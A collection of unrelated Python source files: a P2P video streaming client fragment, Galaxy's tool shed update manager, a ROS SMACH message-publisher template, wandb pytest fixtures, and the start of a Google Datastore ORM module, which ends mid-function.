if DEBUG:
print("rewind: end of buffer need to go to prev node")
def _handle_vcr_op_if_needed(self):
# Check if operation exists
if self._vcr_operation == None:
return
# Check if we reach the percentage of the stream
current_precentage_done = self._playback_offset / self._total_stream_length
if current_precentage_done >= self._vcr_operation_percent_ofstream:
return
# Handle by type
self._speed = self._vcr_operation.speed
if self._vcr_operation.is_forward:
self._speed = self._vcr_operation.speed
self._is_forward = True
elif self._vcr_operation.is_rewind:
self._speed = self._vcr_operation.speed
self._is_forward = False
elif self._vcr_operation.is_seek:
self._playback_offset = self._vcr_operation.offset
# handled, no need for operation no mo (:
self._vcr_operation = None
def _fetch_buffer(self):
# Sleep - mimik async buffering
time.sleep(self._buffering_duration)
# We need to fetch more buffer forward
if self._playback_offset > self._buffer[-1]:
begin = self._playback_offset
end = min(self._playback_offset + self._buffer_size, self._total_stream_length)
if DEBUG:
print("Buffering forward from {} to {}".format(begin, end))
self._buffer = (begin, end)
# We need to fetch more buffer rewind
if self._playback_offset < self._buffer[0]:
begin = self._playback_offset
end = max(0, self._buffer[0] - self._buffer_size)
if end < begin:
tmp = begin
begin = end
end = tmp
if DEBUG:
print("Buffering rewind from {} to {}".format(begin, end))
self._buffer = (begin, end)
def play(self):
assert(self._overlay != None)
self._is_playing = True
if self._play_thread:
raise Exception("Trying to play while playing thread is already running")
self._play_thread = Thread(target=self._play, daemon=True)
if DEBUG:
print("start playing")
self._play_thread.start()
# Network operations
def join(self, overlay): # O(log(N/log(N)))
self._overlay = overlay
overlay.join(self)
# Make sure buffer is updated - i.e simulate ask from server or nearby nodes
if self._playback_offset not in self._buffer:
# Buffering on a different thread to give the async elusion
self._buffering_thread = Thread(target=self._fetch_buffer, daemon=True)
self._buffering_thread.start()
def leave(self): # O(1)
assert(self._overlay != None)
# Before leaving notify the neighbors so they can reconnect
self._overlay.leave(self)
self._overlay = None
# VCR like operations
def pause(self):
assert(self._overlay != None)
if not self._is_playing:
return
self._is_playing = False
# Nothing to do, only if the buffer overflows we leave
# We don't support buffer overflow
def resume(self):
assert(self._overlay != None)
# Make sure we not already playing
if self._is_playing:
return
# Enable palying
self._is_playing = True
# Only if we are not part of the overlay we shall re-join
if self._id not in self._overlay._clients:
self._overlay.join(self)
# Start playing
self.play()
def random_seek(self, new_offset):
assert(self._overlay != None)
overlay = self._overlay
self.leave()
self._playback_offset = new_offset # Set new offset
self.join(overlay)
# Not supported yet
def forward(self, speed):
assert(self._overlay != None)
self._speed = speed
self._is_playing = True
def rewind(self, speed):
assert(self._overlay != None)
self._speed = speed
|
update_repository_manager.py
|
"""
Determine if installed tool shed repositories have updates available in their respective tool sheds.
"""
import logging
import threading
from sqlalchemy import false
from galaxy import util
from galaxy.tool_shed.util.repository_util import get_tool_shed_status_for_installed_repository
from galaxy.tool_shed.util.shed_util_common import clean_dependency_relationships
from galaxy.util.tool_shed.common_util import get_tool_shed_url_from_tool_shed_registry
from galaxy.util.tool_shed.encoding_util import tool_shed_decode
log = logging.getLogger(__name__)
class UpdateRepositoryManager:
def __init__(self, app):
self.app = app
self.context = self.app.install_model.context
# Ideally only one Galaxy server process should be able to check for repository updates.
if self.app.config.enable_tool_shed_check:
self.running = True
self.sleeper = Sleeper()
self.restarter = threading.Thread(target=self.__restarter)
self.restarter.daemon = True
self.app.application_stack.register_postfork_function(self.restarter.start)
self.seconds_to_sleep = int(app.config.hours_between_check * 3600)
def get_update_to_changeset_revision_and_ctx_rev(self, repository):
"""Return the changeset revision hash to which the repository can be updated."""
changeset_revision_dict = {}
tool_shed_url = get_tool_shed_url_from_tool_shed_registry(self.app, str(repository.tool_shed))
params = dict(name=str(repository.name),
owner=str(repository.owner),
changeset_revision=str(repository.installed_changeset_revision))
pathspec = ['repository', 'get_changeset_revision_and_ctx_rev']
try:
encoded_update_dict = util.url_get(tool_shed_url, auth=self.app.tool_shed_registry.url_auth(tool_shed_url), pathspec=pathspec, params=params)
if encoded_update_dict:
update_dict = tool_shed_decode(encoded_update_dict)
includes_data_managers = update_dict.get('includes_data_managers', False)
includes_datatypes = update_dict.get('includes_datatypes', False)
includes_tools = update_dict.get('includes_tools', False)
includes_tools_for_display_in_tool_panel = update_dict.get('includes_tools_for_display_in_tool_panel', False)
includes_tool_dependencies = update_dict.get('includes_tool_dependencies', False)
includes_workflows = update_dict.get('includes_workflows', False)
has_repository_dependencies = update_dict.get('has_repository_dependencies', False)
has_repository_dependencies_only_if_compiling_contained_td = update_dict.get('has_repository_dependencies_only_if_compiling_contained_td', False)
changeset_revision = update_dict.get('changeset_revision', None)
ctx_rev = update_dict.get('ctx_rev', None)
changeset_revision_dict['includes_data_managers'] = includes_data_managers
changeset_revision_dict['includes_datatypes'] = includes_datatypes
changeset_revision_dict['includes_tools'] = includes_tools
changeset_revision_dict['includes_tools_for_display_in_tool_panel'] = includes_tools_for_display_in_tool_panel
changeset_revision_dict['includes_tool_dependencies'] = includes_tool_dependencies
changeset_revision_dict['includes_workflows'] = includes_workflows
changeset_revision_dict['has_repository_dependencies'] = has_repository_dependencies
changeset_revision_dict['has_repository_dependencies_only_if_compiling_contained_td'] = has_repository_dependencies_only_if_compiling_contained_td
changeset_revision_dict['changeset_revision'] = changeset_revision
changeset_revision_dict['ctx_rev'] = ctx_rev
except Exception as e:
log.debug(f"Error getting change set revision for update from the tool shed for repository '{repository.name}': {str(e)}")
changeset_revision_dict['includes_data_managers'] = False
changeset_revision_dict['includes_datatypes'] = False
changeset_revision_dict['includes_tools'] = False
changeset_revision_dict['includes_tools_for_display_in_tool_panel'] = False
changeset_revision_dict['includes_tool_dependencies'] = False
changeset_revision_dict['includes_workflows'] = False
changeset_revision_dict['has_repository_dependencies'] = False
changeset_revision_dict['has_repository_dependencies_only_if_compiling_contained_td'] = False
changeset_revision_dict['changeset_revision'] = None
changeset_revision_dict['ctx_rev'] = None
return changeset_revision_dict
def __restarter(self):
log.info('Update repository manager restarter starting up...')
while self.running:
# Make a call to the Tool Shed for each installed repository to get the latest
# status information in the Tool Shed for the repository. This information includes
# items like newer installable repository revisions, current revision updates, whether
# the repository revision is the latest installable revision, and whether the repository
# has been deprecated in the Tool Shed.
for repository in self.context.query(self.app.install_model.ToolShedRepository) \
.filter(self.app.install_model.ToolShedRepository.table.c.deleted == false()):
tool_shed_status_dict = get_tool_shed_status_for_installed_repository(self.app, repository)
if tool_shed_status_dict:
if tool_shed_status_dict != repository.tool_shed_status:
repository.tool_shed_status = tool_shed_status_dict
self.context.flush()
else:
# The received tool_shed_status_dict is an empty dictionary, so coerce to None.
tool_shed_status_dict = None
if tool_shed_status_dict != repository.tool_shed_status:
repository.tool_shed_status = tool_shed_status_dict
self.context.flush()
self.sleeper.sleep(self.seconds_to_sleep)
log.info('Update repository manager restarter shutting down...')
def shutdown(self):
if self.app.config.enable_tool_shed_check:
self.running = False
self.sleeper.wake()
def update_repository_record(self, repository, updated_metadata_dict, updated_changeset_revision, updated_ctx_rev):
"""
Update a tool_shed_repository database record with new information retrieved from the
Tool Shed. This happens when updating an installed repository to a new changeset revision.
"""
repository.metadata = updated_metadata_dict
tool_shed_url = get_tool_shed_url_from_tool_shed_registry(self.app, repository.tool_shed)
clean_dependency_relationships(self.app, updated_metadata_dict, repository, tool_shed_url)
# Update the repository.changeset_revision column in the database.
repository.changeset_revision = updated_changeset_revision
repository.ctx_rev = updated_ctx_rev
# Update the repository.tool_shed_status column in the database.
tool_shed_status_dict = get_tool_shed_status_for_installed_repository(self.app, repository)
if tool_shed_status_dict:
repository.tool_shed_status = tool_shed_status_dict
else:
repository.tool_shed_status = None
self.app.install_model.context.add(repository)
self.app.install_model.context.flush()
self.app.install_model.context.refresh(repository)
return repository
class Sleeper:
"""
Provides a 'sleep' method that sleeps for a number of seconds *unless* the notify method
is called (from a different thread).
"""
def __init__(self):
self.condition = threading.Condition()
def sleep(self, seconds):
self.condition.acquire()
self.condition.wait(seconds)
self.condition.release()
def wake(self):
self.condition.acquire()
self.condition.notify()
self.condition.release()
|
MsgPublisher.tpl.py
|
{% block meta %}
name: MsgPublisher
description:
SMACH template that provides a MsgPublisher helper class for
PublishMsgState.
language: Python
framework: SMACH
type: None
tags: [core]
includes: []
extends: []
variables: []
input_keys: []
output_keys: []
{% endblock meta %}
{% from "Utils.tpl.py" import import_module, from_import %}
{% block imports %}
{{ import_module(defined_headers, 'rospy') }}
{{ import_module(defined_headers, 'threading') }}
{% endblock imports %}
{% block class_defs %}
{% if 'class_MsgPublisher' not in defined_headers %}
class MsgPublisher(object):
"""
"""
def __init__(self):
# A dict of message publishers indexed by topic
self._pubs = dict()
# A dict of messages indexed by topic
self._msgs = dict()
# A dict of callbacks indexed by topic
self._callbacks = dict()
# A dict of message publication rates indexed by topic
self._pub_rates = dict()
# A dict of message publisher threads indexed by topic
self._pub_threads = dict()
# A dict of message publisher stop flags indexed by topic
self._stop_flags = dict()
# Length of timeout (in seconds) for waiting for the threads to finish
# publishing before forcibly unpublishing.
self._unpublish_timeout = 10.0
def _run_pub_thread(self, topic):
r = rospy.Rate(self._pub_rates[topic])
while not self._stop_flags[topic]:
# Apply callback to message
if self._callbacks[topic]:
try:
self._msgs[topic] = self._callbacks[topic](self._msgs[topic])
except Exception as e:
rospy.logerr('Error when applying callback to message being published on topic {}: {}'.format(topic, repr(e)))
# Publish message
try:
self._pubs[topic].publish(self._msgs[topic])
except Exception as e:
rospy.logerr('Error while publishing to topic {}: {}'.format(topic, repr(e)))
r.sleep()
self._unpublish(topic)
def _unpublish(self, topic):
try:
self._pubs[topic].unregister()
except Exception as e:
rospy.logerr('Failed to unregister publisher of topic {}: {}'.format(topic, repr(e)))
raise
del self._pubs[topic]
del self._msgs[topic]
del self._callbacks[topic]
del self._pub_rates[topic]
def start(self, msg, topic, rate, frame_id=None, callback=None):
# Set the message publisher stopping flag
self._stop_flags[topic] = False
# Save the message
self._msgs[topic] = msg
# Save the message publication rate
self._pub_rates[topic] = rate
# Use frame_id if specified
if frame_id:
try:
assert(isinstance(frame_id, str))
self._msgs[topic].header.frame_id = frame_id
except:
rospy.logwarn('Failed to add specified frame_id {} to message for publication on topic {}: {}'.format(frame_id, topic, repr(e)))
# Use callback if specified
if callback:
try:
assert(callable(callback))
self._callbacks[topic] = callback
except:
rospy.logwarn('Failed to add specified callback {} to publisher of topic {}: {}'.format(callback, topic, repr(e)))
self._callbacks[topic] = None
else:
self._callbacks[topic] = None
# Add publisher
try:
self._pubs[topic] = rospy.Publisher(topic, type(self._msgs[topic]))
except Exception as e:
del self._pub_rates[topic]
self._msgs[topic]
rospy.logwarn('Failed to add publisher for topic {}: {}'.format(topic, repr(e)))
return 'aborted'
# Spin up the message publication thread
self._pub_threads[topic] = threading.Thread(target=self._run_pub_thread, args=[topic])
self._pub_threads[topic].start()
return 'succeeded'
def stop(self, topic):
# Signal thread to stop publishing
self._stop_flags[topic] = True
# Wait for the topic to be unpublished
t = rospy.get_time()
r = rospy.Rate(self._pub_rates[topic])
while topic in list(self._pubs.keys()):
if rospy.get_time() - t < self._unpublish_timeout:
r.sleep()
else:
break
else:
return 'succeeded'
# If the publisher is still running, issue a warning and attempt forced unpublish.
rospy.logwarn('Warning: timeout exceeded for stopping publisher thread for topic {}. Attempting forced stop...'.format(topic))
try:
self._unpublish(topic)
except Exception as e:
rospy.logerr('Error during forced stop of publisher of topic {}: {}'.format(topic, repr(e)))
return 'aborted'
return 'succeeded'
def stop_all(self):
# Stop all current publishers
for topic in self._pubs.keys():
if self.stop(topic) != 'succeeded':
return 'aborted'
return 'succeeded'
{% do defined_headers.append('class_MsgPublisher') %}{% endif %}
{% endblock class_defs %}
|
conftest.py
|
import requests_mock
import os
from click.testing import CliRunner
import pytest
from wandb.history import History
from tests.api_mocks import *
import wandb
from wandb import wandb_run
from wandb.apis import InternalApi
import six
import json
import sys
import time
import threading
import logging
from multiprocessing import Process
from vcr.request import Request
import requests
from wandb import wandb_socket
from wandb import env
from wandb import util
from wandb.wandb_run import Run
from tests import utils
from tests.mock_server import create_app
import socket
def pytest_runtest_setup(item):
wandb.reset_env()
wandb.uninit()
global_settings = os.path.expanduser("~/.config/wandb/settings")
if os.path.exists(global_settings):
try:
os.remove(global_settings)
except OSError:
pass
# This is used to find tests that are leaking outside of tmp directories
os.environ["WANDB_DESCRIPTION"] = item.parent.name + "#" + item.name
def request_repr(self):
try:
body = json.loads(self.body)
query = body.get("query") or "no_query"
render = query.split("(")[0].split("\n")[0] + " - vars: " + str(body.get("variables", {}).get("files", {}))
except (ValueError, TypeError):
render = "BINARY"
return "({}) {} - {}".format(self.method, self.uri, render)
Request.__repr__ = request_repr
# To enable VCR logging uncomment below
#logging.basicConfig() # you need to initialize logging, otherwise you will not see anything from vcrpy
#vcr_log = logging.getLogger("vcr")
#vcr_log.setLevel(logging.INFO)
@pytest.fixture(scope='module')
def vcr_config():
def replace_body(request):
if "storage.googleapis.com" in request.uri:
request.body = "BINARY DATA"
elif "/file_stream" in request.uri:
request.body = json.dumps({"files": list(json.loads(request.body).get("files", {}.keys()))})
return request
def replace_response_body(response, *args):
"""Remove gzip response from pypi"""
if response["headers"].get("Access-Control-Expose-Headers") == ['X-PyPI-Last-Serial']:
if response["headers"].get("Content-Encoding"):
del response["headers"]["Content-Encoding"]
response["body"]["string"] = '{"info":{"version": "%s"}' % wandb.__version__
return response
return {
# Replace the Authorization request header with "DUMMY" in cassettes
"filter_headers": [('authorization', 'DUMMY')],
"match_on": ['method', 'uri', 'query', 'graphql'],
"before_record": replace_body,
"before_record_response": replace_response_body,
}
@pytest.fixture(scope='module')
def vcr(vcr):
def vcr_graphql_matcher(r1, r2):
if "/graphql" in r1.uri and "/graphql" in r2.uri:
body1 = json.loads(r1.body.decode("utf-8"))
body2 = json.loads(r2.body.decode("utf-8"))
return body1["query"].strip() == body2["query"].strip()
elif "/file_stream" in r1.uri and "/file_stream" in r2.uri:
body1 = json.loads(r1.body.decode("utf-8"))
body2 = json.loads(r2.body.decode("utf-8"))
return body1["files"] == body2["files"]
vcr.register_matcher('graphql', vcr_graphql_matcher)
return vcr
@pytest.fixture
def local_netrc(monkeypatch):
with CliRunner().isolated_filesystem():
# TODO: this seems overkill...
origexpand = os.path.expanduser
def expand(path):
return os.path.realpath("netrc") if "netrc" in path else origexpand(path)
monkeypatch.setattr(os.path, "expanduser", expand)
yield
@pytest.fixture
def history():
with CliRunner().isolated_filesystem():
yield Run().history
@pytest.fixture
def wandb_init_run(request, tmpdir, request_mocker, mock_server, monkeypatch, mocker, capsys, local_netrc):
"""Fixture that calls wandb.init(), yields a run (or an exception) that
gets created, then cleans up afterward. This is meant to test the logic
in wandb.init, it should generally not spawn a run_manager. If you need
to test run_manager logic use that fixture.
"""
# save the environment so we can restore it later. pytest
# may actually do this itself. didn't check.
orig_environ = dict(os.environ)
orig_namespace = None
run = None
# Reset the tensorboard and pytest state
wandb.tensorboard.reset_state()
wandb._global_watch_idx = 0
try:
with CliRunner().isolated_filesystem():
if request.node.get_closest_marker('jupyter'):
def fake_ipython():
class Jupyter(object):
__module__ = "jupyter"
def __init__(self):
class Hook(object):
def register(self, what, where):
pass
class Pub(object):
def publish(self, **kwargs):
pass
class Hist(object):
def get_range(self, **kwargs):
return [[None, 1, ('#source code', None)]]
self.events = Hook()
self.display_pub = Pub()
self.history_manager = Hist()
def register_magics(self, magic):
pass
return Jupyter()
wandb.get_ipython = fake_ipython
wandb.jupyter.get_ipython = fake_ipython
# no i/o wrapping - it breaks pytest
os.environ['WANDB_MODE'] = 'clirun'
if request.node.get_closest_marker('headless'):
mocker.patch('subprocess.Popen')
else:
def mock_headless(run, cloud=True):
print("_init_headless called with cloud=%s" % cloud)
mocker.patch('wandb._init_headless', mock_headless)
if not request.node.get_closest_marker('unconfigured'):
os.environ['WANDB_API_KEY'] = 'test'
os.environ['WANDB_ENTITY'] = 'test'
os.environ['WANDB_PROJECT'] = 'unit-test-project'
else:
# when unconfigured we enable run mode to test missing creds
os.environ['WANDB_MODE'] = 'run'
monkeypatch.setattr('wandb.apis.InternalApi.api_key', None)
monkeypatch.setattr(
'getpass.getpass', lambda x: "0123456789012345678901234567890123456789")
assert InternalApi().api_key == None
os.environ['WANDB_RUN_DIR'] = str(tmpdir)
if request.node.get_closest_marker('silent'):
os.environ['WANDB_SILENT'] = "true"
orig_namespace = vars(wandb)
assert wandb.run is None
# Mock out run_manager, we add it to run to access state in tests
orig_rm = wandb.run_manager.RunManager
mock = mocker.patch('wandb.run_manager.RunManager')
def fake_init(run, port=None, output=None, cloud=True):
print("Initialized fake run manager")
rm = fake_run_manager(mocker, run, cloud=cloud, rm_class=orig_rm)
rm._block_file_observer()
run.run_manager = rm
return rm
mock.side_effect = fake_init
if request.node.get_closest_marker('args'):
kwargs = request.node.get_closest_marker('args').kwargs
# Unfortunate to enable the test to work
if kwargs.get("dir"):
del os.environ['WANDB_RUN_DIR']
if kwargs.get("tensorboard"):
# The test uses tensorboardX so we need to be sure it's imported
# we use get_module because tensorboardX isn't available in py2
wandb.util.get_module("tensorboardX")
if kwargs.get("error"):
err = kwargs["error"]
del kwargs['error']
if err == "io":
@classmethod
def error(cls):
raise IOError
monkeypatch.setattr(
'wandb.wandb_run.Run.from_environment_or_defaults', error)
elif err == "socket":
class Error(object):
@property
def port(self):
return 123
def listen(self, secs):
return False, None
monkeypatch.setattr("wandb.wandb_socket.Server", Error)
if kwargs.get('k8s') is not None:
token_path = "/var/run/secrets/kubernetes.io/serviceaccount/token"
crt_path = "/var/run/secrets/kubernetes.io/serviceaccount/ca.crt"
orig_exist = os.path.exists
def exists(path):
return True if path in token_path else orig_exist(path)
def magic(path, *args, **kwargs):
if path == token_path:
return six.StringIO('token')
mocker.patch('wandb.util.open', magic, create=True)
mocker.patch('wandb.util.os.path.exists', exists)
os.environ["KUBERNETES_SERVICE_HOST"] = "k8s"
os.environ["KUBERNETES_PORT_443_TCP_PORT"] = "123"
os.environ["HOSTNAME"] = "test"
if kwargs["k8s"]:
mock_server.ctx["k8s"] = True
del kwargs["k8s"]
if kwargs.get('sagemaker'):
del kwargs['sagemaker']
config_path = "/opt/ml/input/config/hyperparameters.json"
resource_path = "/opt/ml/input/config/resourceconfig.json"
secrets_path = "secrets.env"
os.environ['TRAINING_JOB_NAME'] = 'sage'
os.environ['CURRENT_HOST'] = 'maker'
orig_exist = os.path.exists
def exists(path):
return True if path in (config_path, secrets_path, resource_path) else orig_exist(path)
mocker.patch('wandb.os.path.exists', exists)
def magic(path, *args, **kwargs):
if path == config_path:
return six.StringIO('{"fuckin": "A"}')
elif path == resource_path:
return six.StringIO('{"hosts":["a", "b"]}')
elif path == secrets_path:
return six.StringIO('WANDB_TEST_SECRET=TRUE')
else:
return six.StringIO()
mocker.patch('wandb.open', magic, create=True)
mocker.patch('wandb.util.open', magic, create=True)
elif kwargs.get("tf_config"):
os.environ['TF_CONFIG'] = json.dumps(kwargs['tf_config'])
del kwargs['tf_config']
elif kwargs.get("env"):
for k, v in six.iteritems(kwargs["env"]):
os.environ[k] = v
del kwargs["env"]
else:
kwargs = {}
if request.node.get_closest_marker('resume'):
# env was leaking when running the whole suite...
if os.getenv(env.RUN_ID):
del os.environ[env.RUN_ID]
os.mkdir(wandb.wandb_dir())
with open(os.path.join(wandb.wandb_dir(), wandb_run.RESUME_FNAME), "w") as f:
f.write(json.dumps({"run_id": "test"}))
try:
print("Initializing with", kwargs)
run = wandb.init(**kwargs)
if request.node.get_closest_marker('resume') or request.node.get_closest_marker('mocked_run_manager') or request.node.get_closest_marker('jupyter'):
# Reset history
run._history = None
rm = wandb.run_manager.RunManager(run)
rm.init_run(os.environ)
if request.node.get_closest_marker('mock_socket'):
run.socket = mocker.MagicMock()
assert run is wandb.run
assert run.config is wandb.config
except wandb.LaunchError as e:
print("!!! wandb LaunchError raised")
run = e
yield run
if hasattr(run, "run_manager"):
print("Shutting down run manager")
run.run_manager.test_shutdown()
finally:
# restore the original environment
os.environ.clear()
os.environ.update(orig_environ)
wandb.uninit()
wandb.get_ipython = lambda: None
assert vars(wandb) == orig_namespace
def fake_run_manager(mocker, run=None, cloud=True, rm_class=wandb.run_manager.RunManager):
# NOTE: This will create a run directory so make sure it's called in an isolated file system
# We have an optional rm_class object because we mock it above so we need it before it's mocked
api = InternalApi(load_settings=False)
api.set_setting('project', 'testing')
if wandb.run is None:
wandb.run = run or Run()
wandb.config = wandb.run.config
wandb.run._api = api
wandb.run._mkdir()
wandb.run.socket = wandb_socket.Server()
api.set_current_run_id(wandb.run.id)
mocker.patch('wandb.apis.internal.FileStreamApi')
api._file_stream_api = mocker.MagicMock()
run_manager = rm_class(wandb.run, cloud=cloud, port=wandb.run.socket.port)
class FakeProc(object):
def poll(self):
return None
def exit(self, code=0):
return None
run_manager.proc = FakeProc()
run_manager._meta = mocker.MagicMock()
run_manager._stdout_tee = mocker.MagicMock()
run_manager._stderr_tee = mocker.MagicMock()
run_manager._output_log = mocker.MagicMock()
run_manager._stdout_stream = mocker.MagicMock()
run_manager._stderr_stream = mocker.MagicMock()
run_manager.mirror_stdout_stderr = mocker.MagicMock()
run_manager.unmirror_stdout_stderr = mocker.MagicMock()
socket_thread = threading.Thread(
target=wandb.run.socket.listen)
socket_thread.start()
run_manager._socket.ready()
thread = threading.Thread(
target=run_manager._sync_etc)
thread.daemon = True
thread.start()
def test_shutdown():
if wandb.run and wandb.run.socket:
wandb.run.socket.done()
# TODO: is this needed?
socket_thread.join()
thread.join()
run_manager.test_shutdown = test_shutdown
run_manager._unblock_file_observer()
run_manager._file_pusher._push_function = mocker.MagicMock()
return run_manager
@pytest.fixture
def run_manager(mocker, mock_server):
"""This fixture emulates the run_manager headless mode in a single process
Just call run_manager.test_shutdown() to join the threads
"""
# Reset the tensorboard state
wandb.tensorboard.reset_state()
with CliRunner().isolated_filesystem():
run_manager = fake_run_manager(mocker)
yield run_manager
wandb.uninit()
@pytest.fixture
def loggedin():
orig_environ = dict(os.environ)
try:
with CliRunner().isolated_filesystem():
os.environ["WANDB_API_KEY"] = "X"*40
yield os.environ
finally:
os.environ.clear()
os.environ.update(orig_environ)
wandb.uninit()
@pytest.fixture
def dryrun():
orig_environ = dict(os.environ)
try:
with CliRunner().isolated_filesystem():
os.environ["WANDB_MODE"] = "dryrun"
yield os.environ
finally:
os.environ.clear()
os.environ.update(orig_environ)
wandb.uninit()
# "Error: 'Session' object has no attribute 'request'""
# @pytest.fixture(autouse=True)
# def no_requests(monkeypatch, mock_server):
# monkeypatch.setattr("requests.sessions.Session.request", mock_server.request)
@pytest.fixture
def request_mocker(request, query_viewer):
"""
:param request: pytest request object for cleaning up.
:return: Returns instance of requests mocker used to mock HTTP calls.
"""
m = requests_mock.Mocker()
m.start()
query_viewer(m)
request.addfinalizer(m.stop)
return m
@pytest.fixture(autouse=True)
def preserve_environ():
environ = dict(os.environ)
try:
yield
finally:
os.environ.clear()
os.environ.update(environ)
@pytest.fixture(autouse=True)
def check_environ():
"""Warn about WANDB_ environment variables the user has set
Sometimes it's useful to set things like WANDB_DEBUG intentionally, or
set other things for hacky debugging, but we want to make sure the user
knows about it.
"""
# we ignore WANDB_DESCRIPTION because we set it intentionally in
# pytest_runtest_setup()
wandb_keys = [key for key in os.environ.keys() if key.startswith(
'WANDB_') and key not in ['WANDB_TEST', 'WANDB_DESCRIPTION']]
if wandb_keys:
wandb.termwarn('You have WANDB_ environment variable(s) set. These may interfere with tests:')
for key in wandb_keys:
wandb.termwarn(' {} = {}'.format(key, repr(os.environ[key])))
def default_ctx():
return {
"fail_count": 0,
"page_count": 0,
"page_times": 2,
"files": {},
}
@pytest.fixture
def mock_server(mocker):
ctx = default_ctx()
app = create_app(ctx)
mock = utils.RequestsMock(app, ctx)
mocker.patch("gql.transport.requests.requests", mock)
mocker.patch("wandb.apis.file_stream.requests", mock)
mocker.patch("wandb.apis.internal.requests", mock)
mocker.patch("wandb.apis.public.requests", mock)
mocker.patch("wandb.util.requests", mock)
mocker.patch("wandb.artifacts.requests", mock)
return mock
@pytest.fixture
def live_mock_server(request):
if request.node.get_closest_marker('port'):
port = request.node.get_closest_marker('port').args[0]
else:
port = 8765
app = create_app(default_ctx())
server = Process(target=app.run, kwargs={"port": port, "debug": True, "use_reloader": False})
server.start()
for i in range(5):
try:
time.sleep(1)
res = requests.get("http://localhost:%s/storage" % port, timeout=1)
if res.status_code == 200:
break
print("Attempting to connect but got: %s", res)
except requests.exceptions.RequestException:
print("timed out")
yield server
server.terminate()
server.join()
|
model.py
|
from google.cloud import datastore
from google.cloud.datastore import Query, Client
from google.cloud.datastore.query import Iterator
from google.cloud.datastore import helpers
from google.cloud.datastore import Key
import datetime
from time import sleep
from typing import get_type_hints, List, Union
import copy
import abc
from redis import StrictRedis
import pickle
import asyncio
import logging
from functools import partial
from concurrent.futures import ThreadPoolExecutor, as_completed
from threading import Thread
_MAX_LOOPS = 128
def get_custom_key_from_key(key):
"""
This method is to be called where ndb.Key().get() was being used.
This is because some properties of models are being fetched as Key instead of CustomKey
Once a Key is converted to CustomKey by this method, .get() function can be used similar
to ndb.Key()
:param key: datastore.Key
:return: CustomKey
>>> from google.cloud.datastore import Key
>>> from datastore_orm import get_custom_key_from_key
>>> key = Key('Kind','id_or_name')
>>> key_custom = get_custom_key_from_key(key)
>>> base_model_obj = key_custom.get()
"""
key_custom = CustomIterator.key_from_protobuf(key.to_protobuf())
key_custom._type = SubclassMap.get()[key_custom.kind]
return key_custom
def _extended_lookup(datastore_api, project, key_pbs,
missing=None, deferred=None,
eventual=False, transaction_id=None):
"""Repeat lookup until all keys found (unless stop requested).
Helper function for :meth:`Client.get_multi`.
:type datastore_api:
:class:`google.cloud.datastore._http.HTTPDatastoreAPI`
or :class:`google.cloud.datastore_v1.gapic.DatastoreClient`
:param datastore_api: The datastore API object used to connect
to datastore.
:type project: str
:param project: The project to make the request for.
:type key_pbs: list of :class:`.entity_pb2.Key`
:param key_pbs: The keys to retrieve from the datastore.
:type missing: list
:param missing: (Optional) If a list is passed, the key-only entity
protobufs returned by the backend as "missing" will be
copied into it.
:type deferred: list
:param deferred: (Optional) If a list is passed, the key protobufs returned
by the backend as "deferred" will be copied into it.
:type eventual: bool
:param eventual: If False (the default), request ``STRONG`` read
consistency. If True, request ``EVENTUAL`` read
consistency.
:type transaction_id: str
:param transaction_id: If passed, make the request in the scope of
the given transaction. Incompatible with
``eventual==True``.
:rtype: list of :class:`.entity_pb2.Entity`
:returns: The requested entities.
:raises: :class:`ValueError` if missing / deferred are not null or
empty list.
"""
if missing is not None and missing != []:
raise ValueError('missing must be None or an empty list')
if deferred is not None and deferred != []:
raise ValueError('deferred must be None or an empty list')
results = []
loop_num = 0
read_options = helpers.get_read_options(eventual, transaction_id)
while loop_num < _MAX_LOOPS: # loop against possible deferred.
loop_num += 1
lookup_response = datastore_api.lookup(
project,
key_pbs,
read_options=read_options,
)
# Accumulate the new results.
results.extend(result.entity for result in lookup_response.found)
if missing is not None:
missing.extend(result.entity for result in lookup_response.missing)
if deferred is not None:
deferred.extend(lookup_response.deferred)
break
if len(lookup_response.deferred) == 0:
break
# We have deferred keys, and the user didn't ask to know about
# them, so retry (but only with the deferred ones).
key_pbs = lookup_response.deferred
return results
class UTC(datetime.tzinfo):
"""Basic UTC implementation.
Implementing a small surface area to avoid depending on ``pytz``.
"""
_dst = datetime.timedelta(0)
_tzname = 'UTC'
_utcoffset = _dst
def dst(self, dt): # pylint: disable=unused-argument
"""Daylight savings time offset."""
return self._dst
def fromutc(self, dt):
"""Convert a timestamp from (naive) UTC to this timezone."""
if dt.tzinfo is None:
return dt.replace(tzinfo=self)
return super(UTC, self).fromutc(dt)
def tzname(self, dt): # pylint: disable=unused-argument
"""Get the name of this timezone."""
return self._tzname
def utcoffset(self, dt): # pylint: disable=unused-argument
"""UTC offset of this timezone."""
return self._utcoffset
def __repr__(self):
return '<%s>' % (self._tzname,)
def __str__(self):
return self._tzname
def pb_timestamp_to_datetime(timestamp_pb):
"""Convert a Timestamp protobuf to a datetime object.
:type timestamp_pb: :class:`google.protobuf.timestamp_pb2.Timestamp`
:param timestamp_pb: A Google returned timestamp protobuf.
:rtype: :class:`datetime.datetime`
:returns: A UTC datetime object converted from a protobuf timestamp.
"""
return (
_EPOCH +
datetime.timedelta(
seconds=timestamp_pb.seconds,
microseconds=(timestamp_pb.nanos / 1000.0),
)
)
_EPOCH = datetime.datetime.utcfromtimestamp(0).replace(tzinfo=UTC())
class SubclassMap:
_subclass_map: dict
@staticmethod
def get():
try:
return SubclassMap._subclass_map
except AttributeError:
subclasses = BaseModel.__subclasses__()
SubclassMap._subclass_map = {subclass.__name__: subclass for subclass in subclasses}
return SubclassMap._subclass_map
class CustomIterator(Iterator):
"""CustomIterator overrides the default Iterator and defines a custom _item_to_object method
in order to return BaseModel subclass objects instead of the default datastore entity
"""
def __init__(
self,
model_type,
query,
client,
limit=None,
offset=None,
start_cursor=None,
end_cursor=None,
eventual=False,
):
super(Iterator, self).__init__(
client=client,
item_to_value=self._item_to_object,
page_token=start_cursor,
max_results=limit,
)
self.model_type: BaseModel = model_type
self._query = query
self._offset = offset
self._end_cursor = end_cursor
self._eventual = eventual
# The attributes below will change over the life of the iterator.
self._more_results = True
self._skipped_results = 0
@staticmethod
def object_from_protobuf(pb, model_type=None):
"""Factory method for creating a python object based on a protobuf.
The protobuf should be one returned from the Cloud Datastore
Protobuf API.
:type pb: :class:`.entity_pb2.Entity`
:param pb: The Protobuf representing the entity.
:rtype: :class:`google.cloud.datastore.entity.Entity`
:returns: The entity derived from the protobuf.
"""
key = None
if pb.HasField("key"): # Message field (Key)
key = CustomIterator.key_from_protobuf(pb.key)
key._type = SubclassMap.get()[key.kind]
entity_props = {}
